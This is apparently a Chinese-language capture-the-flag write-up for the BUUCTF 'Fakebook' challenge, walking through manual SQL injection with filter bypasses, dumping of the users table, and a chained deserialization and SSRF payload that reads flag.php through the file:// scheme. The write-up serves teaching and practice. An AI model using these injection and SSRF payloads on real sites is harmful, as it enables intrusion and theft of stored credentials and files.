小羽(鱼)网安,专注于网络空间钓鱼安全
加入网络安全学习群,在后台菜单栏,和大佬们一起交流学习
靶场链接:https://buuoj.cn/challenges#[%E7%BD%91%E9%BC%8E%E6%9D%AF%202018]Fakebook
首页
sql万能密码
登录失败
注册一个账号试试
当前页面好像也没有什么注入点
目录扫描
访问
得到user.php源码
1<?php
2
3
4class UserInfo
5{
6 public $name = "";
7 public $age = 0;
8 public $blog = "";
9
10 public function __construct($name, $age, $blog)
11 {
12 $this->name = $name;
13 $this->age = (int)$age;
14 $this->blog = $blog;
15 }
16
17 function get($url)
18 {
19 $ch = curl_init();
20
21 curl_setopt($ch, CURLOPT_URL, $url);
22 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
23 $output = curl_exec($ch);
24 $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
25 if($httpCode == 404) {
26 return 404;
27 }
28 curl_close($ch);
29
30 return $output;
31 }
32
33 public function getBlogContents ()
34 {
35 return $this->get($this->blog);
36 }
37
38 public function isValidBlog ()
39 {
40 $blog = $this->blog;
41 return preg_match("/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]{2,6}(\:[0-9]+)?(\/\S*)?$/i", $blog);
42 }
43
44}
这句代码,很明显,存在 ssrf漏洞 ,看看待会能不能用上
1function get($url)
2 {
3 $ch = curl_init();
4
5 curl_setopt($ch, CURLOPT_URL, $url);
6 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
7 $output = curl_exec($ch);
8 $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
9 if($httpCode == 404) {
10 return 404;
11 }
12 curl_close($ch);
13
14 return $output;
15 }
❝> SSRF参考: 一文带你了解ssrf
添加一条数据后
看到一个no参数
尝试注入,sql语句错误,存在sql注入漏洞
sqlmap失败
手工添加引号和注释符号#,还是报sql语句错误,没有回显,那么我们去掉单引号试试
1?no=1' and 1=2 #
❝> Sql手工注入文章参考: 从零开始学SQL注入(sql十大注入类型):技术解析与实战演练
正常回显
1?no=1 and 1=2 #
查询没有6列
1?no=1 order by 6 #
order by 4正常回显,存在四列
1?no=1 order by 4 #
没有回显,大概率是过滤掉了,但不知道是过滤哪个关键词
1?no=1 union select 1,2,3,4 #
双写,看样子不是用了替换函数
1?no=1 ununionion select 1,2,3,4 #
使用/**/这个代替空格
1?no=1/**/union/**/select/**/1,2,3,4 #
no改成-1
当前数据库
1?no=-1/**/union/**/select 1,group_concat(database()),3,4 from information_schema.schemata #
fakebook,information_schema,mysql,performance_schema,test
爆表,得到表名users
1?no=-1/**/union/**/select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='fakebook' #
爆列,得到列名
1?no=-1/**/union/**/select 1,group_concat(column_name),3,4 from information_schema.columns where table_schema='fakebook' #
查找用户表中所有符合条件的数据,却发现有一个序列化的结果
1?no=-1/**/union/**/select 1,group_concat(no,'-',username,'-',passwd,'-',data),3,4 from users #
但是,没有正常回显啊
我们这样试试,把4替换为这个序列化的结果
一切正常
且源码中能显示正常结果的,是 data伪协议 标准格式,使用base64加密算法
1data:text/html;base64,PCFET0NUWVBFIGh0bWw+PGh0bWw+PGhlYWQ+PG1ldGEgaHR0cC1lcXVpdj0iQ29udGVudC1UeXBlIiBjb250ZW50PSJ0ZXh0L2h0bWw7IGNoYXJzZXQ9VVRGLTgiPjxtZXRhIGh0dHAtZXF1aXY9IlgtVUEtQ29tcGF0aWJsZSIgY29udGVudD0iSUU9ZWRnZSxjaHJvbWU9MSI+PG1ldGEgY29udGVudD0iYWx3YXlzIiBuYW1lPSJyZWZlcnJlciI+PG1ldGEgbmFtZT0iZGVzY3JpcHRpb24iIGNvbnRlbnQ9IuWFqOeQg+mihuWFiOeahOS4reaWh+aQnOe0ouW8leaTjuOAgeiHtOWKm+S6juiuqee9keawkeabtOS+v+aNt+WcsOiOt+WPluS/oeaBr++8jOaJvuWIsOaJgOaxguOAgueZvuW6pui2hei/h+WNg+S6v+eahOS4reaWh+e9kemhteaVsOaNruW6k++8jOWPr+S7peeerOmXtOaJvuWIsOebuOWFs+eahOaQnOe0oue7k+aenOOAgiI+PGxpbmsgcmVsPSJzaG9ydGN1dCBpY29uIiBocmVmPSIvL3d3dy5iYWlkdS5jb20vZmF2aWNvbi5pY28iIHR5cGU9ImltYWdlL3gtaWNvbiI+PGxpbmsgcmVsPSJzZWFyY2giIHR5cGU9ImFwcGxpY2F0aW9uL29wZW5zZWFyY2hkZXNjcmlwdGlvbit4bWwiIGhyZWY9Ii8vd3d3LmJhaWR1LmNvbS9jb250ZW50LXNlYXJjaC54bWwiIHRpdGxlPSLnmb7luqbmkJzntKIiPjx0aXRsZT7nmb7luqbkuIDkuIvvvIzkvaDlsLHnn6XpgZM8L3RpdGxlPjxzdHlsZSB0eXBlPSJ0ZXh0L2NzcyI+Ym9keXttYXJnaW46MDtwYWRkaW5nOjA7dGV4dC1hbGlnbjpjZW50ZXI7YmFja2dyb3VuZDojZmZmO2hlaWdodDoxMDAlfWh0bWx7b3ZlcmZsb3cteTphdXRvO2NvbG9yOiMwMDA7b3ZlcmZsb3c6LW1vei1zY3JvbGxiYXJzO2hlaWdodDoxMDAlfWJvZHksaW5wdXR7Zm9udC1zaXplOjEycHg7Zm9udC1mYW1pbHk6IlBpbmdGYW5nIFNDIixBcmlhbCwiTWljcm9zb2Z0IFlhSGVpIixzYW5zLXNlcmlmfWF7dGV4dC1kZWNvcmF0aW9uOm5vbmV9YTpob3Zlcnt0ZXh0LWRlY29yYXRpb246dW5kZXJsaW5lfWltZ3tib3JkZXI6MDstbXMtaW50ZXJwb2xhdGlvbi1tb2RlOmJpY3ViaWN9aW5wdXR7Zm9udC1zaXplOjEwMCU7Ym9yZGVyOjB9Ym9keSxmb3Jte3Bvc2l0aW9uOnJlbGF0aXZlO3otaW5kZXg6MH0jd3JhcHBlcntoZWlnaHQ6MTAwJX0jaGVhZF93cmFwcGVyLnMtcHMtaXNsaXRle3BhZGRpbmctYm90dG9tOjM3MHB4fSNoZWFkX3dyYXBwZXIucy1wcy1pc2xpdGUgLnNfZm9ybXtwb3NpdGlvbjpyZWxhdGl2ZTt6LWluZGV4OjF9I2hlYWRfd3JhcHBlci5zLXBzLWlzbGl0ZSAuZm17cG9zaXRpb246YWJzb2x1dGU7Ym90dG9tOjB9I2hlYWRfd3JhcHBlci5zLXBzLWlzbGl0ZSAucy1wLXRvcHtwb3NpdGlvbjphYnNvbHV0ZTtib3R0b206NDBweDt3aWR0aDoxMDAlO2hlaWdodDoxODFweH0jaGVhZF93cmFwcGVyLnMtcHMtaXNsaXRlICNzX2xnX2ltZ3twb3NpdGlvbjpzdGF0aWM7bWFyZ2luOjMzcHggYXV0byAwIGF1dG87bGVmdDo1MCV9I2Zvcm17ei1pbmRleDoxfS5zX2Zvcm1fd3JhcHBlcntoZWlnaHQ6MTAwJX0jbGh7bWFyZ2luOjE2cHggMCA1cHg7d29yZC1zcGFjaW5nOjNweH0uYy1mb250LW5vcm1hbHtmb250OjEzcHgvMjNweCBBcmlhbCxzYW5zLXNlcmlmfS5jLWNvbG9yLXR7Y29sb3I6IzIyMn0uYy1idG4sLmMtYnRuOnZpc2l0ZWR7Y29sb3I6IzMzMyFpbXBvcnRhbnR9LmMtYnRue2Rpc3BsYXk6aW5saW5lLWJsb2NrO292ZXJmbG93OmhpZGRlbjtmb250LWZhbWlseTppbmhlcml0O2ZvbnQtd2VpZ2h0OjQwMDt0ZXh0LWFsaWduOmNlbnRlcjt2ZXJ0aWNhbC1hbGlnbjptaWRkbGU7b3V0bGluZTowO2JvcmRlcjowO2hlaWdodDozMHB4O3dpZHRoOjgwcHg7bGluZS1oZWlnaHQ6MzBweDtmb250LXNpemU6MTNweDtib3JkZXItcmFkaXVzOjZweDtwYWRkaW5nOjA7YmFja2dyb3VuZC1jb2xvcjojZjVmNWY2O2N1cnNvcjpwb2ludGVyfS5jLWJ0bjpob3ZlcntiYWNrZ3JvdW5kLWNvbG9yOiMzMTVlZmI7Y29sb3I6I2ZmZiFpbXBvcnRhbnR9YS5jLWJ0bnt0ZXh0LWRlY29yYXRpb246bm9uZX0uYy1idG4tbWluaXtoZWlnaHQ6MjRweDt3aWR0aDo0OHB4O2xpbmUtaGVpZ2h0OjI0cHh9LmMtYnRuLXByaW1hcnksLmMtYnRuLXByaW1hcnk6dmlzaXRlZHtjb2xvcjojZmZmIWltcG9ydGFudH0uYy1idG4tcHJpbWFyeXtiYWNrZ3JvdW5kLWNvbG9yOiM0ZTZlZjJ9LmMtYnRuLXByaW1hcnk6aG92ZXJ7YmFja2dyb3VuZC1jb2xvcjojMzE1ZWZifWE6YWN0aXZle2NvbG9yOiNmNjB9I3dyYXBwZXJ7cG9zaXRpb246cmVsYXRpdmU7bWluLWhlaWdodDoxMDAlfSNoZWFke3BhZGRpbmctYm90dG9tOjEwMHB4O3RleHQtYWxpZ246Y2VudGVyfSN3cmFwcGVye21pbi13aWR0aDoxMjUwcHg7aGVpZ2h0OjEwMCU7bWluLWhlaWdodDo2MDBweH0jaGVhZHtwb3NpdGlvbjpyZWxhdGl2ZTtwYWRkaW5nLWJvdHRvbTowO2hlaWdodDoxMDAlO21pbi1oZWlnaHQ6NjAwcHh9LnNfZm9ybV93cmFwcGVye2hlaWdodDoxMDAlfS5xdWlja2RlbGV0ZS13cmFwe3Bvc2l0aW9uOnJlbGF0aXZlfS50b29sc3twb3NpdGlvbjphYnNvbHV0ZTtyaWdodDotNzVweH0ucy1pc2luZGV4LXdyYXB7cG9zaXRpb246cmVsYXRpdmV9I2hlYWRfd3JhcHBlci5oZWFkX3dyYXBwZXJ7d2lkdGg6YXV0b30jaGVhZF93cmFwcGVye3Bvc2l0aW9uOnJlbGF0aXZlO2hlaWdodDo0MCU7bWluLWhlaWdodDozMTRweDttYXgtaGVpZ2h0OjUxMHB4O3dpZHRoOjEwMDBweDttYXJnaW46MCBhdXRvfSNoZWFkX3dyYXBwZXIgLnMtcC10b3B7aGVpZ2h0OjYwJTttaW4taGVpZ2h0OjE4NXB4O21heC1oZWlnaHQ6MzEwcHg7cG9zaXRpb246cmVsYXRpdmU7ei1pbmRleDowO3RleHQtYWxpZ246Y2VudGVyfSNoZWFkX3dyYXBwZXIgaW5wdXR7b3V0bGluZTowOy13ZWJraXQtYXBwZWFyYW5jZTpub25lfSNoZWFkX3dyYXBwZXIgLnNfYnRuX3dyLCNoZWFkX3dyYXBwZXIgLnNfaXB0X3dye2Rpc3BsYXk6aW5saW5lLWJsb2NrO3pvb206MTtiYWNrZ3JvdW5kOjAgMDt2ZXJ0aWNhbC1hbGlnbjp0b3B9I2hlYWRfd3JhcHBlciAuc19pcHRfd3J7cG9zaXRpb246cmVsYXRpdmU7d2lkdGg6NTQ2cHh9I2hlYWRfd3JhcHBlciAuc19idG5fd3J7d2lkdGg6MTA4cHg7aGVpZ2h0OjQ0cHg7cG9zaXRpb246cmVsYXRpdmU7ei1pbmRleDoyfSNoZWFkX3dyYXBwZXIgLnNfaXB0X3dyOmhvdmVyICNrd3tib3JkZXItY29sb3I6I2E3YWFiNX0jaGVhZF93cmFwcGVyICNrd3t3aWR0aDo1MTJweDtoZWlnaHQ6MTZweDtwYWRkaW5nOjEycHggMTZweDtmb250LXNpemU6MTZweDttYXJnaW46MDt2ZXJ0aWNhbC1hbGlnbjp0b3A7b3V0bGluZTowO2JveC1zaGFkb3c6bm9uZTtib3JkZXItcmFkaXVzOjEwcHggMCAwIDEwcHg7Ym9yZGVyOjJweCBzb2xpZCAjYzRjN2NlO2JhY2tncm91bmQ6I2ZmZjtjb2xvcjojMjIyO292ZXJmbG93OmhpZGRlbjtib3gtc2l6aW5nOmNvbnRlbnQtYm94fSNoZWFkX3dyYXBwZXIgI2t3OmZvY3Vze2JvcmRlci1jb2xvcjojNGU2ZWYyIWltcG9ydGFudDtvcGFjaXR5OjF9I2hlYWRfd3JhcHBlciAuc19mb3Jte3dpZHRoOjY1NHB4O2hlaWdodDoxMDAlO21hcmdpbjowIGF1dG87dGV4dC1hbGlnbjpsZWZ0O3otaW5kZXg6MTAwfSNoZWFkX3dyYXBwZXIgLnNfYnRue2N1cnNvcjpwb2ludGVyO3dpZHRoOjEwOHB4O2hlaWdodDo0NHB4O2xpbmUtaGVpZ2h0OjQ1cHg7cGFkZGluZzowO2JhY2tncm91bmQ6MCAwO2JhY2tncm91bmQtY29sb3I6IzRlNmVmMjtib3JkZXItcmFkaXVzOjAgMTBweCAxMHB4IDA7Zm9udC1zaXplOjE3cHg7Y29sb3I6I2ZmZjtib3gtc2hhZG93Om5vbmU7Zm9udC13ZWlnaHQ6NDAwO2JvcmRlcjpub25lO291dGxpbmU6MH0jaGVhZF93cmFwcGVyIC5zX2J0bjpob3ZlcntiYWNrZ3JvdW5kLWNvbG9yOiM0NjYyZDl9I2hlYWRfd3JhcHBlciAuc19idG46YWN0aXZle2JhY2tncm91bmQtY29sb3I6IzQ2NjJkOX0jaGVhZF93cmFwcGVyIC5xdWlja2RlbGV0ZS13cmFwe3Bvc2l0aW9uOnJlbGF0aXZlfSNzX3RvcF93cmFwe3Bvc2l0aW9uOmFic29sdXRlO3otaW5kZXg6OTk7bWluLXdpZHRoOjEwMDBweDt3aWR0aDoxMDAlfS5zLXRvcC1sZWZ0e3Bvc2l0aW9uOmFic29sdXRlO2xlZnQ6MDt0b3A6MDt6LWluZGV4OjEwMDtoZWlnaHQ6NjBweDtwYWRkaW5nLWxlZnQ6MjRweH0ucy10b3AtbGVmdCAubW5hdnttYXJnaW4tcmlnaHQ6MzFweDttYXJnaW4tdG9wOjE5cHg7ZGlzcGxheTppbmxpbmUtYmxvY2s7cG9zaXRpb246cmVsYXRpdmV9LnMtdG9wLWxlZnQgLm1uYXY6aG92ZXIgLnMtYnJpLC5zLXRvcC1sZWZ0IGE6aG92ZXJ7Y29sb3I6IzMxNWVmYjt0ZXh0LWRlY29yYXRpb246bm9uZX0ucy10b3AtbGVmdCAucy10b3AtbW9yZS1idG57cGFkZGluZy1ib3R0b206MTlweH0ucy10b3AtbGVmdCAucy10b3AtbW9yZS1idG46aG92ZXIgLnMtdG9wLW1vcmV7ZGlzcGxheTpibG9ja30ucy10b3AtcmlnaHR7cG9zaXRpb246YWJzb2x1dGU7cmlnaHQ6MDt0b3A6MDt6LWluZGV4OjEwMDtoZWlnaHQ6NjBweDtwYWRkaW5nLXJpZ2h0OjI0cHh9LnMtdG9wLXJpZ2h0IC5zLXRvcC1yaWdodC10ZXh0e21hcmdpbi1sZWZ0OjMycHg7bWFyZ2luLXRvcDoxOXB4O2Rpc3BsYXk6aW5saW5lLWJsb2NrO3Bvc2l0aW9uOnJlbGF0aXZlO3ZlcnRpY2FsLWFsaWduOnRvcDtjdXJzb3I6cG9pbnRlcn0ucy10b3AtcmlnaHQgLnMtdG9wLXJpZ2h0LXRleHQ6aG92ZXJ7Y29sb3I6IzMxNWVmYn0ucy10b3AtcmlnaHQgLnMtdG9wLWxvZ2luLWJ0bntkaXNwbGF5OmlubGluZS1ibG9jazttYXJnaW4tdG9wOjE4cHg7bWFyZ2luLWxlZnQ6MzJweDtmb250LXNpemU6MTNweH0ucy10b3AtcmlnaHQgYTpob3Zlcnt0ZXh0LWRlY29yYXRpb246bm9uZX0jYm90dG9tX2xheWVye3dpZHRoOjEwMCU7cG9zaXRpb246Zml4ZWQ7ei1pbmRleDozMDI7Ym90dG9tOjA7bGVmdDowO2hlaWdodDozOXB4O3BhZGRpbmctdG9wOjFweDtvdmVyZmxvdzpoaWRkZW47em9vbToxO21hcmdpbjowO2xpbmUtaGVpZ2h0OjM5cHg7YmFja2dyb3VuZDojZmZmfSNib3R0b21fbGF5ZXIgLmxoe2Rpc3BsYXk6aW5saW5lO21hcmdpbi1yaWdodDoyMHB4fSNib3R0b21fbGF5ZXIgLmxoOmxhc3QtY2hpbGR7bWFyZ2luLWxlZnQ6LTJweDttYXJnaW4tcmlnaHQ6MH0jYm90dG9tX2xheWVyIC5saC5hY3Rpdml0eXtmb250LXdlaWdodDo3MDA7dGV4dC1kZWNvcmF0aW9uOnVuZGVybGluZX0jYm90dG9tX2xheWVyIGF7Zm9udC1zaXplOjEycHg7dGV4dC1kZWNvcmF0aW9uOm5vbmV9I2JvdHRvbV9sYXllciAudGV4dC1jb2xvcntjb2xvcjojYmJifSNib3R0b21fbGF5ZXIgYTpob3Zlcntjb2xvcjojMjIyfSNib3R0b21fbGF5ZXIgLnMtYm90dG9tLWxheWVyLWNvbnRlbnR7dGV4dC1hbGlnbjpjZW50ZXJ9PC9zdHlsZT48L2hlYWQ+PGJvZHk+PGRpdiBpZD0id3JhcHBlciIgY2xhc3M9IndyYXBwZXJfbmV3Ij48ZGl2IGlkPSJoZWFkIj48ZGl2IGlkPSJzLXRvcC1sZWZ0IiBjbGFzcz0icy10b3AtbGVmdCBzLWlzaW5kZXgtd3JhcCI+PGEgaHJlZj0iLy9uZXdzLmJhaWR1LmNvbS8iIHRhcmdldD0iX2JsYW5rIiBjbGFzcz0ibW5hdiBjLWZvbnQtbm9ybWFsIGMtY29sb3ItdCI+5paw6Ze7PC9hPjxhIGhyZWY9Ii8vd3d3LmhhbzEyMy5jb20vIiB0YXJnZXQ9Il9ibGFuayIgY2xhc3M9Im1uYXYgYy1mb250LW5vcm1hbCBjLWNvbG9yLXQiPmhhbzEyMzwvYT48YSBocmVmPSIvL21hcC5iYWlkdS5jb20vIiB0YXJnZXQ9Il9ibGFuayIgY2xhc3M9Im1uYXYgYy1mb250LW5vcm1hbCBjLWNvbG9yLXQiPuWcsOWbvjwvYT48YSBocmVmPSIvL2xpdmUuYmFpZHUuY29tLyIgdGFyZ2V0PSJfYmxhbmsiIGNsYXNzPSJtbmF2IGMtZm9udC1ub3JtYWwgYy1jb2xvci10Ij7nm7Tmkq08L2E+PGEgaHJlZj0iLy9oYW9rYW4uYmFpZHUuY29tLz9zZnJvbT1iYWlkdS10b3AiIHRhcmdldD0iX2JsYW5rIiBjbGFzcz0ibW5hdiBjLWZvbnQtbm9ybWFsIGMtY29sb3ItdCI+6KeG6aKRPC9hPjxhIGhyZWY9Ii8vdGllYmEuYmFpZHUuY29tLyIgdGFyZ2V0PSJfYmxhbmsiIGNsYXNzPSJtbmF2IGMtZm9udC1ub3JtYWwgYy1jb2xvci10Ij7otLTlkKc8L2E+PGEgaHJlZj0iLy94dWVzaHUuYmFpZHUuY29tLyIgdGFyZ2V0PSJfYmxhbmsiIGNsYXNzPSJtbmF2IGMtZm9udC1ub3JtYWwgYy1jb2xvci10Ij7lrabmnK88L2E+PGRpdiBjbGFzcz0ibW5hdiBzLXRvcC1tb3JlLWJ0biI+PGEgaHJlZj0iLy93d3cuYmFpZHUuY29tL21vcmUvIiBuYW1lPSJ0al9icmlpY29uIiBjbGFzcz0icy1icmkgYy1mb250LW5vcm1hbCBjLWNvbG9yLXQiIHRhcmdldD0iX2JsYW5rIj7mm7TlpJo8L2E+PC9kaXY+PC9kaXY+PGRpdiBpZD0idTEiIGNsYXNzPSJzLXRvcC1yaWdodCBzLWlzaW5kZXgtd3JhcCI+PGEgY2xhc3M9InMtdG9wLWxvZ2luLWJ0biBjLWJ0biBjLWJ0bi1wcmltYXJ5IGMtYnRuLW1pbmkgbGIiIHN0eWxlPSJwb3NpdGlvbjpyZWxhdGl2ZTtvdmVyZmxvdzp2aXNpYmxlIiBuYW1lPSJ0al9sb2dpbiIgaHJlZj0iLy93d3cuYmFpZHUuY29tL2Jkb3J6L2xvZ2luLmdpZj9sb2dpbiZhbXA7dHBsPW1uJmFtcDt1PWh0dHAlM0ElMkYlMkZ3d3cuYmFpZHUuY29tJTJmJTNmYmRvcnpfY29tZSUzZDEiPueZu+W9lTwvYT48L2Rpdj48ZGl2IGlkPSJoZWFkX3dyYXBwZXIiIGNsYXNzPSJoZWFkX3dyYXBwZXIgcy1pc2luZGV4LXdyYXAgcy1wcy1pc2xpdGUiPjxkaXYgY2xhc3M9InNfZm9ybSI+PGRpdiBjbGFzcz0ic19mb3JtX3dyYXBwZXIiPjxkaXYgaWQ9ImxnIiBjbGFzcz0icy1wLXRvcCI+PGltZyBoaWRlZm9jdXM9InRydWUiIGlkPSJzX2xnX2ltZyIgY2xhc3M9ImluZGV4LWxvZ28tc3JjIiBzcmM9Ii8vd3d3LmJhaWR1LmNvbS9pbWcvZmxleGlibGUvbG9nby9wYy9pbmRleC5wbmciIHdpZHRoPSIyNzAiIGhlaWdodD0iMTI5IiB1c2VtYXA9IiNtcCI+PG1hcCBuYW1lPSJtcCI+PGFyZWEgc3R5bGU9Im91dGxpbmU6MCIgaGlkZWZvY3VzPSJ0cnVlIiBzaGFwZT0icmVjdCIgY29vcmRzPSIwLDAsMjcwLDEyOSIgaHJlZj0iLy93d3cuYmFpZHUuY29tL3M/d2Q9JUU3JTk5JUJFJUU1JUJBJUE2JUU3JTgzJUFEJUU2JTkwJTlDJmFtcDtzYT1pcmVfZGxfZ2hfbG9nb190ZXhpbmcmYW1wO3Jzdl9kbD1pZ2hfbG9nb19wY3MiIHRhcmdldD0iX2JsYW5rIiB0aXRsZT0i54K55Ye75LiA5LiL77yM5LqG6Kej5pu05aSaIj48L21hcD48L2Rpdj48YSBocmVmPSIvL3d3dy5iYWlkdS5jb20vIiBpZD0icmVzdWx0X2xvZ28iPjwvYT48Zm9ybSBpZD0iZm9ybSIgbmFtZT0iZiIgYWN0aW9uPSIvL3d3dy5iYWlkdS5jb20vcyIgY2xhc3M9ImZtIj48aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJpZSIgdmFsdWU9InV0Zi04Ij4gPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iZiIgdmFsdWU9IjgiPiA8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJyc3ZfYnAiIHZhbHVlPSIxIj4gPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0icnN2X2lkeCIgdmFsdWU9IjEiPiA8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJjaCIgdmFsdWU9IiI+IDxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9InRuIiB2YWx1ZT0iYmFpZHUiPiA8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJiYXIiIHZhbHVlPSIiPiA8c3BhbiBjbGFzcz0ic19pcHRfd3IgcXVpY2tkZWxldGUtd3JhcCI+PGlucHV0IGlkPSJrdyIgbmFtZT0id2QiIGNsYXNzPSJzX2lwdCIgdmFsdWU9IiIgbWF4bGVuZ3RoPSIyNTUiIGF1dG9jb21wbGV0ZT0ib2ZmIj4gPC9zcGFuPjxzcGFuIGNsYXNzPSJzX2J0bl93ciI+PGlucHV0IHR5cGU9InN1Ym1pdCIgaWQ9InN1IiB2YWx1ZT0i55m+5bqm5LiA5LiLIiBjbGFzcz0iYmcgc19idG4iPiA8L3NwYW4+PGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0icm4iIHZhbHVlPSIiPiA8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJmZW5sZWkiIHZhbHVlPSIyNTYiPiA8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJvcSIgdmFsdWU9IiI+IDxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9InJzdl9wcSIgdmFsdWU9ImI5ZmYwOTNlMDAwMGU0MTkiPiA8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJyc3ZfdCIgdmFsdWU9IjM2MzVGWWJkYkM4dGxXbXVkWm1ZYVVuYXVjTmUrUnpUek5FR3FnL0p1bmlRVTEwV0w1bXRNUWVoSXJVIj4gPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0icnFsYW5nIiB2YWx1ZT0iY24iPiA8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJyc3ZfZW50ZXIiIHZhbHVlPSIxIj4gPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0icnN2X2RsIiB2YWx1ZT0iaWIiPjwvZm9ybT48L2Rpdj48L2Rpdj48L2Rpdj48ZGl2IGlkPSJib3R0b21fbGF5ZXIiIGNsYXNzPSJzLWJvdHRvbS1sYXllciBzLWlzaW5kZXgtd3JhcCI+PGRpdiBjbGFzcz0icy1ib3R0b20tbGF5ZXItY29udGVudCI+PHAgY2xhc3M9ImxoIj48YSBjbGFzcz0idGV4dC1jb2xvciIgaHJlZj0iLy9ob21lLmJhaWR1LmNvbS8iIHRhcmdldD0iX2JsYW5rIj7lhbPkuo7nmb7luqY8L2E+PC9wPjxwIGNsYXNzPSJsaCI+PGEgY2xhc3M9InRleHQtY29sb3IiIGhyZWY9Ii8vaXIuYmFpZHUuY29tLyIgdGFyZ2V0PSJfYmxhbmsiPkFib3V0IEJhaWR1PC9hPjwvcD48cCBjbGFzcz0ibGgiPjxhIGNsYXNzPSJ0ZXh0LWNvbG9yIiBocmVmPSIvL3d3dy5iYWlkdS5jb20vZHV0eSIgdGFyZ2V0PSJfYmxhbmsiPuS9v+eUqOeZvuW6puWJjeW/heivuzwvYT48L3A+PHAgY2xhc3M9ImxoIj48YSBjbGFzcz0idGV4dC1jb2xvciIgaHJlZj0iLy9oZWxwLmJhaWR1LmNvbS8iIHRhcmdldD0iX2JsYW5rIj7luK7liqnkuK3lv4M8L2E+PC9wPjxwIGNsYXNzPSJsaCI+PGEgY2xhc3M9InRleHQtY29sb3IiIGhyZWY9Ii8vd3d3LmJlaWFuLmdvdi5jbi9wb3J0YWwvcmVnaXN0ZXJTeXN0ZW1JbmZvP3JlY29yZGNvZGU9MTEwMDAwMDIwMDAwMDEiIHRhcmdldD0iX2JsYW5rIj7kuqzlhaznvZHlronlpIcxMTAwMDAwMjAwMDAwMeWPtzwvYT48L3A+PHAgY2xhc3M9ImxoIj48YSBjbGFzcz0idGV4dC1jb2xvciIgaHJlZj0iLy9iZWlhbi5taWl0Lmdvdi5jbi8iIHRhcmdldD0iX2JsYW5rIj7kuqxJQ1Dor4EwMzAxNzPlj7c8L2E+PC9wPjxwIGNsYXNzPSJsaCI+PHNwYW4gaWQ9InllYXIiIGNsYXNzPSJ0ZXh0LWNvbG9yIj48L3NwYW4+PC9wPjxwIGNsYXNzPSJsaCI+PHNwYW4gY2xhc3M9InRleHQtY29sb3IiPuS6kuiBlOe9keiNr+WTgeS/oeaBr+acjeWKoei1hOagvOivgeS5piAo5LqsKS3nu4/okKXmgKctMjAxNy0wMDIwPC9zcGFuPjwvcD48cCBjbGFzcz0ibGgiPjxhIGNsYXNzPSJ0ZXh0LWNvbG9yIiBocmVmPSIvL3d3dy5iYWlkdS5jb20vbGljZW5jZS8iIHRhcmdldD0iX2JsYW5rIj7kv6Hmga/nvZHnu5zkvKDmkq3op4blkKzoioLnm67orrjlj6/or4EgMDExMDUxNjwvYT48L3A+PC9kaXY+PC9kaXY+PC9kaXY+PC9kaXY+PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPnZhciBkYXRlPW5ldyBEYXRlLHllYXI9ZGF0ZS5nZXRGdWxsWWVhcigpO2RvY3VtZW50LmdldEVsZW1lbnRCeUlkKCJ5ZWFyIikuaW5uZXJUZXh0PSLCqSIreWVhcisiIEJhaWR1ICI8L3NjcmlwdD48L2JvZHk+PC9odG1sPg==
解密之后,这不就是我新加的那条数据blog的网址嘛,确实存在 ssrf漏洞
构造序列化对象,我们使用 file 协议,读取本地文件( /var/www/html/flag.php 这个路径之前每个报错界面基本都有,猜测flag在这个站点根目录下)
❝> file:// 用于访问本地文件系统,在CTF中通常用来读取本地文件,且不受PHP的allow_url_fopen与allow_url_include配置影响
例如读取D盘目录下的指定文件:http://127.0.0.1/cmd.php?file=file://D:/soft/phpStudy/WWW/phpcode.txt
1class UserInfo
2{
3 public $name = "";
4 public $age = 0;
5 public $blog = "";
6}
7$res = new UserInfo();
8echo serialize($res); // O:8:"UserInfo":3:{s:4:"name";s:5:"mochu";s:3:"age";i:7;s:4:"blog";s:29:"file:///var/www/html/flag.php";}
构造payload
1?no=-1/**/union/**/select 1,group_concat(no,'-',username,'-',passwd,'-',data),3,'O:8:"UserInfo":3:{s:4:"name";s:5:"mochu";s:3:"age";i:7;s:4:"blog";s:29:"file:///var/www/html/flag.php";}' from users #
查看源码
解密得到flag
❝> 往期文章推荐